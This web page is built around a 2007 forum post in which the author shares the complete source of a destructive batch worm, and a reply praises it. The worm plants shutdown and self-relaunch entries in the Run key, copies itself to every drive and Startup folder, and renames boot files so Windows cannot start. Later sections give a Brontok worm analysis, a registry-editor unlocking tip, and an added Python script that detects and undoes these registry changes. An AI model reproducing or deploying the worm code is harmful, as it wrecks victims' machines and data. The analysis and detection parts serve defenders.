Anatomy of a worm written with plain Windows batch commands


On 8/26/07, Shezan <shezan2k7[at]gmail.com> wrote:
I created it with Notepad. I actually created an MS-DOS .bat file using Notepad and then converted the shezan.bat file to .exe using a bat2exe program. It's nothing; I just cobbled it together somehow… Check the source code…
@echo off
REM Stage 1: persistence. Two values under the HKLM Run key (so they apply to every user): one runs shutdown.exe -f at logon, the other relaunches shezan.exe.
date 12-16-2020 | time 16:00:47.47

SET KEY=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
REG ADD %KEY% /V Shezan /D "shutdown.exe -f" /f

SET KEY=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
REG ADD %KEY% /V ShezanStart /D "shezan.exe" /f

REM Stage 2: spread. Copy itself to the root of every drive letter (h: is missing from this list).
copy shezan.exe c:
copy shezan.exe d:
copy shezan.exe e:
copy shezan.exe f:
copy shezan.exe g:
copy shezan.exe i:
copy shezan.exe j:
copy shezan.exe k:
copy shezan.exe l:
copy shezan.exe m:
copy shezan.exe n:
copy shezan.exe o:
copy shezan.exe p:
copy shezan.exe q:
copy shezan.exe r:
copy shezan.exe s:
copy shezan.exe t:
copy shezan.exe u:
copy shezan.exe v:
copy shezan.exe w:
copy shezan.exe x:
copy shezan.exe y:
copy shezan.exe z:

REM Stage 3: more drop points. %windir% (which is what lets the unqualified "shezan.exe" in the Run value be found) and the All Users Startup folder on every drive.
copy shezan.exe %windir%
copy shezan.exe "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "D:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "E:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "F:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "G:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "H:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "I:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "J:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "K:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "L:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "M:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "N:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "O:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "P:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "Q:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "R:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "S:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "T:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "U:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "V:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "W:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "X:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "Y:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "Z:\Documents and Settings\All Users\Start Menu\Programs\Startup"

REM Stage 4: payload. Clear the hidden/system attributes on the NT boot files (boot.ini, ntldr, NTDETECT.COM) on every drive and rename them; without ntldr an NT 5.x system cannot boot.
Attrib -h -s c:\boot.ini
ren c:\boot.ini shezan.ini

Attrib -h -s d:\boot.ini
ren D:\boot.ini shezan.ini

Attrib -h -s e:\boot.ini
ren E:\boot.ini shezan.ini

Attrib -h -s f:\boot.ini
ren F:\boot.ini shezan.ini

Attrib -h -s g:\boot.ini
ren G:\boot.ini shezan.ini

Attrib -h -s h:\boot.ini
ren H:\boot.ini shezan.ini

Attrib -h -s i:\boot.ini
ren I:\boot.ini shezan.ini

Attrib -h -s j:\boot.ini
ren J:\boot.ini shezan.ini

Attrib -h -s k:\boot.ini
ren K:\boot.ini shezan.ini

Attrib -h -s l:\boot.ini
ren L:\boot.ini shezan.ini

Attrib -h -s m:\boot.ini
ren M:\boot.ini shezan.ini

Attrib -h -s n:\boot.ini
ren N:\boot.ini shezan.ini

Attrib -h -s O:\boot.ini
ren O:\boot.ini shezan.ini

Attrib -h -s p:\boot.ini
ren P:\boot.ini shezan.ini

Attrib -h -s q:\boot.ini
ren Q:\boot.ini shezan.ini

Attrib -h -s r:\boot.ini
ren r:\boot.ini shezan.ini

Attrib -h -s s:\boot.ini
ren S:\boot.ini shezan.ini

Attrib -h -s t:\boot.ini
ren T:\boot.ini shezan.ini

Attrib -h -s u:\boot.ini
ren u:\boot.ini shezan.ini

Attrib -h -s v:\boot.ini
ren v:\boot.ini shezan.ini

Attrib -h -s w:\boot.ini
ren w:\boot.ini shezan.ini

Attrib -h -s x:\boot.ini
ren X:\boot.ini shezan.ini

Attrib -h -s y:\boot.ini
ren Y:\boot.ini shezan.ini

Attrib -h -s z:\boot.ini
ren Z:\boot.ini shezan.ini

Attrib -h -s c:\ntldr
ren c:\ntldr shezanldr

Attrib -h -s d:\ntldr
ren D:\ntldr shezanldr

Attrib -h -s e:\ntldr
ren E:\ntldr shezanldr

Attrib -h -s f:\ntldr
ren F:\ntldr shezanldr

Attrib -h -s g:\ntldr
ren G:\ntldr shezanldr

Attrib -h -s h:\ntldr
ren H:\ntldr shezanldr

Attrib -h -s i:\ntldr
ren I:\ntldr shezanldr

Attrib -h -s j:\ntldr
ren J:\ntldr shezanldr

Attrib -h -s k:\ntldr
ren K:\ntldr shezanldr

Attrib -h -s l:\ntldr
ren L:\ntldr shezanldr

Attrib -h -s m:\ntldr
ren M:\ntldr shezanldr

Attrib -h -s n:\ntldr
ren N:\ntldr shezanldr

Attrib -h -s O:\ntldr
ren O:\ntldr shezanldr

Attrib -h -s p:\ntldr
ren P:\ntldr shezanldr

Attrib -h -s q:\ntldr
ren Q:\ntldr shezanldr

Attrib -h -s r:\ntldr
ren r:\ntldr shezanldr

Attrib -h -s s:\ntldr
ren S:\ntldr shezanldr

Attrib -h -s t:\ntldr
ren T:\ntldr shezanldr

Attrib -h -s u:\ntldr
ren u:\ntldr shezanldr

Attrib -h -s v:\ntldr
ren v:\ntldr shezanldr

Attrib -h -s w:\ntldr
ren w:\ntldr shezanldr

Attrib -h -s x:\ntldr
ren X:\ntldr shezanldr

Attrib -h -s y:\ntldr
ren Y:\ntldr shezanldr

Attrib -h -s z:\ntldr
ren Z:\ntldr shezanldr

Attrib -h -s c:\NTDETECT.COM
ren c:\NTDETECT.COM SHEZAN.COM

Attrib -h -s d:\NTDETECT.COM
ren D:\NTDETECT.COM SHEZAN.COM

Attrib -h -s e:\NTDETECT.COM
ren E:\NTDETECT.COM SHEZAN.COM

Attrib -h -s f:\NTDETECT.COM
ren F:\NTDETECT.COM SHEZAN.COM

Attrib -h -s g:\NTDETECT.COM
ren G:\NTDETECT.COM SHEZAN.COM

Attrib -h -s h:\NTDETECT.COM
ren H:\NTDETECT.COM SHEZAN.COM

Attrib -h -s i:\NTDETECT.COM
ren I:\NTDETECT.COM SHEZAN.COM

Attrib -h -s j:\NTDETECT.COM
ren J:\NTDETECT.COM SHEZAN.COM

Attrib -h -s k:\NTDETECT.COM
ren K:\NTDETECT.COM SHEZAN.COM

Attrib -h -s l:\NTDETECT.COM
ren L:\NTDETECT.COM SHEZAN.COM

Attrib -h -s m:\NTDETECT.COM
ren M:\NTDETECT.COM SHEZAN.COM

Attrib -h -s n:\NTDETECT.COM
ren N:\NTDETECT.COM SHEZAN.COM

Attrib -h -s O:\NTDETECT.COM
ren O:\NTDETECT.COM SHEZAN.COM

Attrib -h -s p:\NTDETECT.COM
ren P:\NTDETECT.COM SHEZAN.COM

Attrib -h -s q:\NTDETECT.COM
ren Q:\NTDETECT.COM SHEZAN.COM

Attrib -h -s r:\NTDETECT.COM
ren r:\NTDETECT.COM SHEZAN.COM

Attrib -h -s s:\NTDETECT.COM
ren S:\NTDETECT.COM SHEZAN.COM

Attrib -h -s t:\NTDETECT.COM
ren T:\NTDETECT.COM SHEZAN.COM

Attrib -h -s u:\NTDETECT.COM
ren u:\NTDETECT.COM SHEZAN.COM

Attrib -h -s v:\NTDETECT.COM
ren v:\NTDETECT.COM SHEZAN.COM

Attrib -h -s w:\NTDETECT.COM
ren w:\NTDETECT.COM SHEZAN.COM

Attrib -h -s x:\NTDETECT.COM
ren X:\NTDETECT.COM SHEZAN.COM

Attrib -h -s y:\NTDETECT.COM
ren Y:\NTDETECT.COM SHEZAN.COM

Attrib -h -s z:\NTDETECT.COM
ren Z:\NTDETECT.COM SHEZAN.COM

REM Stage 5: launch the copies (u: and v: are missing from this list).
shezan.exe
c:\shezan.exe
d:\shezan.exe
e:\shezan.exe
f:\shezan.exe
g:\shezan.exe
h:\shezan.exe
i:\shezan.exe
j:\shezan.exe
k:\shezan.exe
l:\shezan.exe
m:\shezan.exe
n:\shezan.exe
o:\shezan.exe
p:\shezan.exe
q:\shezan.exe
r:\shezan.exe
s:\shezan.exe
t:\shezan.exe
w:\shezan.exe
x:\shezan.exe
y:\shezan.exe
z:\shezan.exe
exit

BRAVO!!! that you've found a great security hole Windows has. It's a security hole because Windows lets the program change certain settings without taking precautions. Have you tested the renaming part of this?
Now listen. It's nothing near a virus. It's just malware. A virus needs lots of capabilities to be called a virus: replication, infection, spreading automatically, infecting new PCs through any executable files, and many more. It can, though, be called a worm.
Antiviruses detect it, as they test in heuristic mode…

How do you enable Registry Editing again if it has been disabled by your administrator?

A way to get into the registry editor if it's been disabled; here's how you do it:

1. Disable as much as you can from your startup. Remove programs from your Startup folder and such, so as not to slow down the boot process.

2. Create a new shortcut on your desktop and point it to "C:\Windows\regedit.exe".

3. Log off, then log back on.

4. As soon as you see your desktop, double-click the shortcut. The system does not check for policies until a few seconds after it has booted up. If you click the icon fast enough, it should let you get in.

After that, do all you need. After you close it though, it will not open unless you redo steps 3 and 4.


There's one VBS script to enable registry editing, and below is the link.

www.dougknox.com/security/scripts_desc/regtools.htm

The way to get into registry editing is simple. Open your Start menu, click Run and paste in the following command:

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f

Submitted by HaXxOr.

Administrator does not disable registry editing; it's the bloody virus called rontokbro@mm. You can remove the virus, but to enable registry editing you will need the tool provided by Symantec on their web site: http://securityresponse.symantec.com/avcenter/venc/data/tool.to.reset.shellopencommand.registry.keys.html You can also learn about rontokbro@mm on this site. 1) Download the .inf file. 2) Right-click it and choose Install. Apparently nothing happens, but amazingly registry editing is enabled; type regedit at the command prompt or in Run and enjoy. Muzammal Baig.

This section is for technical experts who want to know more.

W32/Brontok-C is an email worm that sends itself to the addresses gathered from the infected computer, skipping email addresses that contain the following strings:

PLASA,TELKOM,INDO,.CO.ID,.GO.ID,.MIL.ID,.SCH.ID,.NET.ID,.OR.ID,.AC.ID,.WEB.ID,.WAR.NET.ID,ASTAGA,GAUL,BOLEH,EMAILKU,SATU

W32/Brontok-C may arrive as an attachment with a filename randomly chosen from the following:

winword.exe
kangen.exe
ccapps.exe
syslove.exe
untukmu.exe
myheart.exe
my heart.exe
jangan dibuka.exe

The email is sent with a blank subject line and the following message text (Indonesian, quoted verbatim since it is what the message actually contains):

— Hentikan kebobrokan di negeri ini — 1. Penjarakan Koruptor, Penyelundup, Tukang Suap, & Bandar NARKOBA ( Send to "NUSAKAMBANGAN") 2. Stop Free Sex, Aborsi, & Prostitusi ( Go To HELL ) 3. Stop pencemaran lingkungan, pembakaran hutan & perburuan liar. 4. SAY NO TO DRUGS !!! — KIAMAT SUDAH DEKAT — Terinspirasi oleh: Elang Brontok (Spizaetus Cirrhatus) yang hampir punah By: HVM31 — JowoBot #VM Community — !!! Akan Kubuat Mereka (VM lokal yg cengeng & bodoh) Terkapar !!!

In English: "Stop the rot in this country. 1. Imprison the corruptors, smugglers, bribe-takers & drug bosses (send them to "NUSAKAMBANGAN"). 2. Stop free sex, abortion & prostitution (go to HELL). 3. Stop environmental pollution, forest burning & poaching. 4. SAY NO TO DRUGS!!! Judgment Day is near. Inspired by: the Brontok eagle (Spizaetus cirrhatus), which is nearly extinct. By: HVM31, JowoBot #VM Community. !!! I will knock them (the whiny & stupid local VMs) flat !!!"

When first run W32/Brontok-C copies itself to:

\Local Settings\Application Data\csrss.exe
\Local Settings\Application Data\inetinfo.exe
\Local Settings\Application Data\lsass.exe
\Local Settings\Application Data\services.exe
\Local Settings\Application Data\smss.exe
\Local Settings\Application Data\winlogon.exe
\Empty.pif
\Templates\Brengkolang.com
\ShellNew\sempalong.exe
\eksplorasi.exe
\repclient1's Setting.scr

W32/Brontok-C creates a scheduled task (an AT job) in the following location in order to run a copy of itself daily and so maintain the infection:

\Tasks\At1.job

W32/Brontok-C attempts to download files from a remote website to the following locations:

\Local Settings\Application Data\ListHost11.txt
\Local Settings\Application Data\Update.11.Bron.Tok.bin

At the time of writing these files were unavailable from the remote website. The following registry entries are created to run W32/Brontok-C on startup:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
    Tok-Cirrhatus = \Local Settings\Application Data\smss.exe

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Bron-Spizaetus = \ShellNew\sempalong.exe

The following registry entry is changed to run eksplorasi.exe on startup:

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    Shell = Explorer.exe "\eksplorasi.exe"

(The default value for this registry entry is "Explorer.exe", which causes the Microsoft file \Explorer.exe to be run on startup; Winlogon also starts anything appended after it.)

The following registry entry is set, disabling the registry editor (regedit):

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System
    DisableRegistryTools = 1

Registry entries are set as follows:

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
    NoFolderOptions = 1

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System
    DisableCMD = 0

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
    Hidden = 0

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
    HideFileExt = 1

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
    ShowSuperHidden
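Both the batch worm at the top of this page (its two HKLM Run values) and W32/Brontok-C leave their tracks in the same few registry keys: the Run keys, the Winlogon Shell value, and the Policies and Explorer\Advanced values that switch off regedit and hide file extensions. The script below is an added example and not code from the original post or from any vendor write-up. It checks those indicators offline against the text produced by reg export (the .reg format), so an analyst can run it over an export pulled from a suspect machine rather than on the live registry, and it emits the reg.exe commands that undo each finding (the DisableRegistryTools one being the same command a commenter gives above). The sample export it parses is constructed for the example, and the ALLOWED_RUN allowlist is an assumption about how an analyst would suppress known-good Run entries.

```python
"""Offline check for the registry changes described on this page: Run-key
persistence, the Winlogon Shell hijack, and the policy values that disable
regedit or hide file extensions. Input is 'reg export' (.reg) text, so it
can run on an export from a suspect host without touching its live registry."""
import re

HIVES = {"HKEY_LOCAL_MACHINE": "HKLM", "HKEY_CURRENT_USER": "HKCU"}
RUN_KEYS = (r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
            r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run")
WINLOGON = r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
POLICY_SYSTEM = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System"
POLICY_EXPLORER = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
ADVANCED = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
# DWORD values that should not be 1 on a healthy host.
BAD_IF_SET = ((POLICY_SYSTEM, "DisableRegistryTools"), (POLICY_SYSTEM, "DisableCMD"),
              (POLICY_EXPLORER, "NoFolderOptions"), (ADVANCED, "HideFileExt"))
# Assumption: Run values the analyst has verified as legitimate on this host.
ALLOWED_RUN = {"syntpenh"}

# Constructed sample export (not a real capture): the batch worm's two Run
# values plus Brontok-style entries, next to one benign Run value.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Shezan"="shutdown.exe -f"
"ShezanStart"="shezan.exe"
"Bron-Spizaetus"="C:\\WINDOWS\\ShellNew\\sempalong.exe"
"SynTPEnh"="C:\\Program Files\\Synaptics\\SynTP\\SynTPEnh.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="Explorer.exe \"C:\\WINDOWS\\eksplorasi.exe\""

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000001
"DisableCMD"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"HideFileExt"=dword:00000001
"""

SECTION_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')


def norm(key):
    """Short hive name + lower case, so an export's HKEY_LOCAL_MACHINE matches HKLM."""
    hive, _, rest = key.partition("\\")
    return (HIVES.get(hive.upper(), hive) + "\\" + rest).lower()


def parse_reg(text):
    """Parse .reg text into {normalised key: {value name: data}}. Only REG_SZ and
    REG_DWORD are decoded; other types and the default value (@=) are skipped."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        sec = SECTION_RE.match(line)
        if sec:
            current = norm(sec.group(1))
            keys.setdefault(current, {})
            continue
        val = VALUE_RE.match(line)
        if not val or current is None:
            continue
        name, data = val.group(1), val.group(2)
        if data.startswith("dword:"):
            keys[current][name] = int(data[6:], 16)
        elif len(data) >= 2 and data[0] == data[-1] == '"':
            # .reg escapes backslash and double quote with a backslash.
            keys[current][name] = re.sub(r"\\(.)", r"\1", data[1:-1])
    return keys


def find_indicators(keys):
    """Return (kind, key, value name, data) tuples for each suspicious entry."""
    findings = []
    for key in RUN_KEYS:
        for name, data in keys.get(norm(key), {}).items():
            if name.lower() not in ALLOWED_RUN:
                findings.append(("run-key persistence", key, name, data))
    shell = keys.get(norm(WINLOGON), {}).get("Shell")
    # Anything appended after Explorer.exe is started by Winlogon at logon.
    if shell is not None and shell.strip().lower() != "explorer.exe":
        findings.append(("winlogon shell hijack", WINLOGON, "Shell", shell))
    for key, name in BAD_IF_SET:
        if keys.get(norm(key), {}).get(name) == 1:
            findings.append(("policy tamper", key, name, 1))
    return findings


def remediation(findings):
    """reg.exe commands that undo each finding (run them from an elevated prompt)."""
    cmds = []
    for kind, key, name, data in findings:
        if kind == "run-key persistence":
            cmds.append(f'reg delete "{key}" /v "{name}" /f')
        elif kind == "winlogon shell hijack":
            cmds.append(f'reg add "{key}" /v Shell /t REG_SZ /d Explorer.exe /f')
        else:
            cmds.append(f'reg add "{key}" /v {name} /t REG_DWORD /d 0 /f')
    return cmds


if __name__ == "__main__":
    found = find_indicators(parse_reg(SAMPLE_REG))
    print("\n".join(remediation(found)))
```

On the sample the checker flags the three non-allowlisted Run values, the Shell hijack, DisableRegistryTools and HideFileExt, and leaves DisableCMD=0 alone. Note that the Run-key check is allowlist based on purpose: a value with a bare image name such as "shezan.exe", with no directory, is exactly the kind of entry that looks harmless and is resolved through the system search path, so flagging everything not explicitly known-good is safer than pattern matching on names.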